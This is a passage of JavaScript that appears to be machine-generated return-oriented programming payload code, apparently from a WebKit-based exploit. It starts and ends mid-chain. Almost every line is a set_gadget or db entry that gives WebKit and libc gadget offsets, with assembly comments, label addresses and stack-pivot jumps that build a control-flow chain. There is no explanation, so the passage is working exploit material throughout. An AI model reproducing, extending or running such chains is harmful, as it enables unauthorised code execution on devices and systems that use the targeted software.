webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9402:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9403:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9404:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
webkit_base+5168252, //setl al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+442072, //L9406
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+442088, //L9407
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+442056, //L9405
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L9405:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9406:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9407:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+442200, //L9409
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+442248, //L9412
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+442216, //L9410
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L9409:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9410:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L9411:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9412:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+442360, //L9413+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+442352, //L9413
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L9413:
db([0, 0]); // 0x0
set_gadgets([
ropchain+442376, //L9413+24
ropchain+442704, //L9408
libc_base+764760, //pop rsi
ropchain+442416, //L9414
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L9414:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L9416:
db([4294967240, 4294967295]); // -0x38
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+442536, //L9419
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+442520, //L9417
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L9417:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9419:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+442680, //L9423
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+442648, //L9421
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+442664, //L9422
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9421:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9422:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9423:
db([0, 0]); // 0x0
set_gadgets([
libc_base+782311, //pop rsp
ropchain+443264, //L9420
//L9408:
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+442744, //L9424
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L9424:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9425:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9426:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+442872, //L9428
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+442856, //L9427
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L9427:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9428:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+442952, //L9429
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L9429:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L9431:
db([4294967240, 4294967295]); // -0x38
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+443072, //L9434
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+443056, //L9432
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L9432:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9434:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+443184, //L9435
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+443216, //L9437
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+443200, //L9436
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9435:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9436:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9437:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+835093, //sub rax, rcx ; sbb rdx, rcx
//L9420:
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+443336, //L9438
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L9438:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L9440:
db([32, 0]); // 0x20
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+443456, //L9443
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+443440, //L9441
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L9441:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9443:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+443600, //L9446
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+443568, //L9444
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+443584, //L9445
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9444:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9445:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9446:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+443680, //L9447
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L9447:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L9449:
db([4294967272, 4294967295]); // -0x18
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+443800, //L9452
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+443784, //L9450
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L9450:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9452:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+443944, //L9455
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+443912, //L9453
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+443928, //L9454
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9453:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9454:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9455:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+444024, //L9456
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L9456:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L9458:
db([24, 0]); // 0x18
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+444144, //L9461
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+444128, //L9459
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L9459:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9461:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+444288, //L9464
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+444256, //L9462
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+444272, //L9463
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9462:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9463:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9464:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+444368, //L9465
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L9465:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L9467:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+444488, //L9470
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+444472, //L9468
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L9468:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9470:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+444632, //L9473
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+444600, //L9471
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+444616, //L9472
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9471:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9472:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9473:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608, //pop rax
//L9475:
ropchain+444736, //L9474
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+782311, //pop rsp
ropchain+296568, //__ntoa_long_long
//L9474:
libc_base+853989, //mov rax, rcx
libc_base+764760 //pop rsi
]);
db([4294967216, 4294967295]); // -0x50
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+444808, //L9476
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L9476:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L9478:
db([4294967272, 4294967295]); // -0x18
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+764760, //pop rsi
ropchain+444888, //L9480
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L9480:
db([0, 0]); // 0x0
set_gadgets([
libc_base+782311, //pop rsp
ropchain+466440, //L9479
//L9297:
libc_base+764760, //pop rsi
ropchain+444952, //L9482
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L9482:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L9484:
db([4294967292, 4294967295]); // -0x4
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+445072, //L9487
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+445056, //L9485
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L9485:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9487:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+445248, //L9490
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+445264, //L9491
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+445216, //L9488
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+445232, //L9489
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9488:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L9489:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9490:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9491:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+445360, //L9493
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+445344, //L9492
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L9492:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9493:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L9494:
db([1, 0]); // 0x1
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L9495:
db([8, 0]); // 0x8
set_gadget(libc_base+763368,); //pop rcx
//L9496:
db([8, 0]); // 0x8
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+445560, //L9498
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L9498:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+445616, //L9499
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L9499:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+14664103, //and rax, rcx
libc_base+764760, //pop rsi
ropchain+445752, //L9503
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+445736, //L9502
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9501:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L9502:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9503:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+445888, //L9506
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+445920, //L9508
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+445872, //L9505
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9505:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L9506:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L9507:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9508:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+446032, //L9509+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+446024, //L9509
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L9509:
db([0, 0]); // 0x0
set_gadgets([
ropchain+446048, //L9509+24
ropchain+453024, //L9504
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L9510:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L9512:
db([48, 0]); // 0x30
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+446184, //L9515
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+446168, //L9513
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L9513:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9515:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+446344, //L9519
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+446296, //L9516
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+446312, //L9517
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9516:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9517:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L9518:
db([8, 0]); // 0x8
set_gadget(libc_base+759608,); //pop rax
//L9519:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+446400, //L9520
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L9520:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L9522:
db([48, 0]); // 0x30
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+446520, //L9523
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+446536, //L9525
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L9523:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9525:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+446624, //L9526
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+446640, //L9528
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L9526:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9528:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L9529:
db([4294967232, 4294967295]); // -0x40
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+731401, //mov rax, r8
libc_base+764760 //pop rsi
]);
//L9531:
db([4294967292, 4294967295]); // -0x4
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+446800, //L9534
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+446784, //L9532
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L9532:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9534:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+446976, //L9537
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+446992, //L9538
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+446944, //L9535
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+446960, //L9536
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9535:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L9536:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9537:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9538:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+447088, //L9540
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+447072, //L9539
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L9539:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9540:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+447168, //L9541
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L9541:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L9543:
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+447288, //L9546
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+447272, //L9544
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L9544:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9546:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+447464, //L9549
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+447480, //L9550
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+447432, //L9547
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+447448, //L9548
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9547:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L9548:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9549:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9550:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+447576, //L9552
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+447560, //L9551
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L9551:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9552:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+447656, //L9553
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L9553:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L9555:
db([4294967284, 4294967295]); // -0xc
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+447776, //L9558
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+447760, //L9556
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L9556:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9558:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+447952, //L9561
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+447968, //L9562
